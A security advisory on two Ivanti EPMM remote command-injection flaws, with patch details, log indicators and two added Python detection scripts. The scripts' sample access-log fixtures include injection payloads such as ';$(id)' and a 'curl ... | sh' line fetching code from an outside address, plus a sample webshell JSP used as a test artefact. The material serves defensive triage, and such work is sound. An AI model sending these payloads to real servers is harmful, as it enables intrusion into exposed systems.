Executive Summary

    On January 29th, Ivanti published an advisory concerning two vulnerabilities (tracked as CVE-2026-1281 and CVE-2026-1340) in their Endpoint Manager Mobile (EPMM) product. Both vulnerabilities were listed as remote command injection bugs that allow a successful attacker to achieve unauthenticated remote code execution (RCE) on an affected device. EPMM is often deployed directly exposed to the internet, and as such can provide threat actors with initial access to an organization's network. Ivanti confirmed in their advisory that a "very limited number of customers" had been exploited at the time of disclosure. Additionally, CISA added both vulnerabilities to its Known Exploited Vulnerabilities catalog the same day.

    No deep technical details of the bugs or public proof-of-concept (PoC) exploits had been published at the time of writing; however, Ivanti released patches at the time of disclosure. Beazley Security expects threat actors who are not already in possession of private weaponized exploits to study the patches and deploy their own exploits in the coming days. Beazley Security strongly recommends that affected organizations apply the vendor-supplied security fixes as soon as possible.

    Affected Systems or Products

    Product                                  Affected Version        Fixed Version
    Ivanti Endpoint Manager Mobile (EPMM)    12.5.0.0 and prior      RPM 12.x.0.x
                                             12.6.0.0 and prior
                                             12.7.0.0 and prior
    Ivanti Endpoint Manager Mobile (EPMM)    12.5.1.0 and prior      RPM 12.x.1.x
                                             12.6.1.0 and prior

    Mitigations / Workarounds

    No mitigations or workarounds aside from the available security patches have been provided by Ivanti.

    Patches

    Ivanti provided software patches at the time of disclosure for the affected versions listed above. The patches are in RPM package format, and short instructions for where to get the patches and how to install the patch packages can be found in the advisory here. Additionally, Ivanti encourages customers to upgrade to 12.8.0.0 which is to be released in Q1 2026.

    Indicators of Compromise

    Ivanti provided good guidance on searching logs for indicators of attack and successful exploitation. Their recommendations are generic (rather than specific indicators like IPs or injected commands) and were informed by the few verified breaches that happened as a result of these vulnerabilities. Their guidance documentation with generalized indicators can be found here. We will provide a summarized version below.

    The vulnerabilities affect two specific features:

    • In-House Application Distribution, and

    • Android File Transfer Configuration

    Traffic to those endpoints can be reviewed in the Apache Access Log at:

    /var/log/httpd/https-access_log

    Normal traffic will result in HTTP response codes of 200, while exploit attempts will cause HTTP response codes of 404. More importantly, exploit attempts will show bash commands in the HTTP parameters.

    The following regular expression was suggested to assist with log file triage. It skips requests originating from 127.0.0.1 and matches requests to either of the two affected endpoints that were answered with a 404:

    ^(?!127\.0\.0\.1:\d+ .*$).*?\/mifs\/c\/(aft|app)store\/fob\/.*?404 
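To show how the suggested regex behaves on real-looking log lines, and where it needs tightening, the following is an added example written for this page; it is not Ivanti's or Beazley Security's code. The field layout of https-access_log (client:port, ident, user, timestamp, request, status, size) and the sample log lines are constructed assumptions for the demonstration. The block applies Ivanti's regex verbatim, then runs a stricter pass that parses the status field (the bare `.*?404` in the regex also matches a "404" inside a response size such as 4041) and URL-decodes the request so that shell metacharacters hidden behind %-encoding are still visible.

```python
import re
from urllib.parse import unquote

# Ivanti's suggested triage regex, exactly as quoted in the guidance above.
IVANTI_TRIAGE_RE = re.compile(
    r"^(?!127\.0\.0\.1:\d+ .*$).*?\/mifs\/c\/(aft|app)store\/fob\/.*?404"
)

# Assumed line layout for https-access_log (an assumption for this example, not
# taken from Ivanti documentation): client:port ident user [time] "request" status size
ACCESS_LINE_RE = re.compile(
    r'^(?P<client>[\d.]+):\d+ \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)
# The two endpoints named in the guidance.
TARGET_PATH_RE = re.compile(r"/mifs/c/(aft|app)store/fob/")
# Shell metacharacters that should never appear in these parameters. This is a
# heuristic for prioritising review, not proof of exploitation; '&' is left out
# because it is a normal query-string separator.
SHELL_META_RE = re.compile(r"[;|`$]")

# Constructed sample lines for the demonstration; none are real EPMM log entries
# and the client addresses are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7:51324 - - [29/Jan/2026:10:15:01 +0000] "GET /mifs/c/appstore/fob/ HTTP/1.1" 200 1432
127.0.0.1:40212 - - [29/Jan/2026:10:15:05 +0000] "GET /mifs/c/aftstore/fob/ HTTP/1.1" 404 212
203.0.113.9:44120 - - [29/Jan/2026:10:16:33 +0000] "POST /mifs/c/aftstore/fob/;$(id) HTTP/1.1" 404 212
203.0.113.9:44121 - - [29/Jan/2026:10:16:40 +0000] "GET /mifs/c/appstore/fob/?f=`curl%20http://203.0.113.9/s%7Csh` HTTP/1.1" 404 212
198.51.100.7:51330 - - [29/Jan/2026:10:17:02 +0000] "GET /mifs/login.jsp HTTP/1.1" 200 9876
198.51.100.7:51331 - - [29/Jan/2026:10:17:09 +0000] "GET /mifs/c/appstore/fob/ HTTP/1.1" 200 4041
192.0.2.44:60001 - - [29/Jan/2026:10:18:50 +0000] "GET /mifs/c/aftstore/fob/ HTTP/1.1" 404 212
"""
SAMPLE_LINES = SAMPLE_LOG.splitlines()


def regex_hits(lines):
    """Lines matched by Ivanti's regex applied verbatim (includes the 4041-byte false positive)."""
    return [line for line in lines if IVANTI_TRIAGE_RE.search(line)]


def triage(lines):
    """Stricter pass: parse each line, keep only genuine 404s to the two vulnerable
    endpoints from non-loopback clients, and flag whether the URL-decoded request
    carries shell metacharacters (the 'bash commands in the HTTP parameters' the
    guidance describes)."""
    findings = []
    for line in lines:
        m = ACCESS_LINE_RE.match(line)
        if not m:
            continue  # unparseable line; review separately rather than silently drop
        if m["client"] == "127.0.0.1" or m["status"] != "404":
            continue
        if not TARGET_PATH_RE.search(m["request"]):
            continue
        decoded = unquote(m["request"])
        findings.append({
            "client": m["client"],
            "time": m["time"],
            "request": decoded,
            "shell_meta": bool(SHELL_META_RE.search(decoded)),
        })
    return findings


if __name__ == "__main__":
    print(f"Ivanti regex: {len(regex_hits(SAMPLE_LINES))} hit(s)")
    for f in triage(SAMPLE_LINES):
        tag = "COMMAND-LIKE" if f["shell_meta"] else "probe/other"
        print(f"{f['time']} {f['client']:<14} {tag:<12} {f['request']}")
```

On the constructed input the verbatim regex returns four lines, one of which is a successful 200 whose size field happens to contain "404". The stricter pass keeps three: two requests carrying `;$(id)` and a backtick-wrapped `curl ... | sh`, and one bare 404 from an external client that looks like a scanner probe rather than an injection attempt. Both outputs deserve a look, but the `shell_meta` flag is what separates the entries to escalate from the ones to note.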

    Ivanti has also noted that, following exploitation of previous vulnerabilities in these systems, threat actors commonly attempted persistence post-compromise via:

    • webshells disguised as HTTP error pages, like 401.jsp

    • unexpected WAR or JAR files imported to the device
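A way to hunt for those two persistence patterns is to compare the appliance's web and library directories against a known-good file inventory and inspect whatever differs. The following is an added example written for this page, not Ivanti's or Beazley Security's tooling. The directory layout (`webapps/mifs`, `lib`), the baseline, and every file in the demonstration tree are constructed for the example; EPMM's real install locations are not given on this page and must be substituted. The JSP check looks for the disguise Ivanti describes (a file named after an HTTP error status, such as 401.jsp) that also contains the Java idioms needed to run OS commands, so a genuine error page in the baseline is not flagged.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# JSP files named after an HTTP error status, the disguise Ivanti describes (e.g. 401.jsp).
ERROR_PAGE_JSP_RE = re.compile(r"^[45]\d\d\.jsp$")
# Java idioms a JSP needs to run OS commands; a real error page has no reason to contain them.
EXEC_MARKER_RE = re.compile(rb"Runtime\.getRuntime\(\)\.exec|ProcessBuilder")
ARCHIVE_SUFFIXES = {".war", ".jar"}


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def inventory(root):
    """Relative path -> sha256 for every file under root; taken from a known-good install."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_of(p) for p in root.rglob("*") if p.is_file()}


def hunt(root, baseline):
    """Compare the tree against the baseline and report the two persistence patterns."""
    root = Path(root)
    findings = []
    for p in sorted(root.rglob("*")):
        if not p.is_file():
            continue
        rel = p.relative_to(root).as_posix()
        if baseline.get(rel) == sha256_of(p):
            continue  # byte-identical to the known-good file
        if p.suffix in ARCHIVE_SUFFIXES:
            findings.append((rel, "archive not in baseline" if rel not in baseline else "archive modified"))
        elif p.suffix == ".jsp":
            if ERROR_PAGE_JSP_RE.match(p.name) and EXEC_MARKER_RE.search(p.read_bytes()):
                findings.append((rel, "error-page JSP that executes commands"))
            else:
                findings.append((rel, "jsp not in baseline" if rel not in baseline else "jsp modified"))
    return findings


def build_demo_tree():
    """Constructed layout for the demonstration. The paths are hypothetical, not EPMM's real
    install locations. Returns (root, baseline) with the baseline taken before the implants."""
    root = Path(tempfile.mkdtemp(prefix="epmm-hunt-"))
    (root / "webapps/mifs").mkdir(parents=True)
    (root / "lib").mkdir()
    (root / "webapps/mifs/login.jsp").write_text("<html>login form</html>\n")
    (root / "webapps/mifs/404.jsp").write_text("<html>Not Found</html>\n")  # genuine error page
    (root / "lib/mifs-core.jar").write_bytes(b"PK\x03\x04 legit jar bytes")
    baseline = inventory(root)
    # Post-compromise artefacts modelled on the two patterns above. Fixture content only:
    # the JSP references an undefined 'cmd' and is not a working shell.
    (root / "webapps/mifs/401.jsp").write_text("<% Runtime.getRuntime().exec(cmd); %>\n")
    (root / "lib/dropped.jar").write_bytes(b"PK\x03\x04 unexpected jar bytes")
    return root, baseline


if __name__ == "__main__":
    root, baseline = build_demo_tree()
    for rel, why in hunt(root, baseline):
        print(f"{why:<40} {rel}")
```

The baseline should come from a clean appliance of the same version (or a vendor-published manifest, where one exists), not from the suspect host after the fact; an inventory taken post-compromise will simply bless whatever the attacker left behind.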

    Technical Details

    At the time of the disclosure no in-depth technical details were provided by Ivanti; however, their analysis guidance documentation provided enough information to understand the nature of the vulnerabilities. Specifically, the two targeted EPMM components were In-House Application Distribution and Android File Transfer Configuration.

    Additionally, Ivanti noted that exploit attempts against those endpoints produce 404 responses in the access log and that bash commands appear in the HTTP parameters. This hints at a classic case of incoming, attacker-controlled HTTP traffic being passed unfiltered to code that executes injected system commands.

    How Beazley Security is responding

    Beazley Security is monitoring client perimeter devices through our Exposure Management Platform to identify impacted devices and support organizations in remediation of any issues found.

    We are also conducting threat hunts across our MDR environment to detect potential exploitation attempts against our clients.

    If you believe your organization may have been impacted by this attack campaign and need support, please contact our Incident Response team.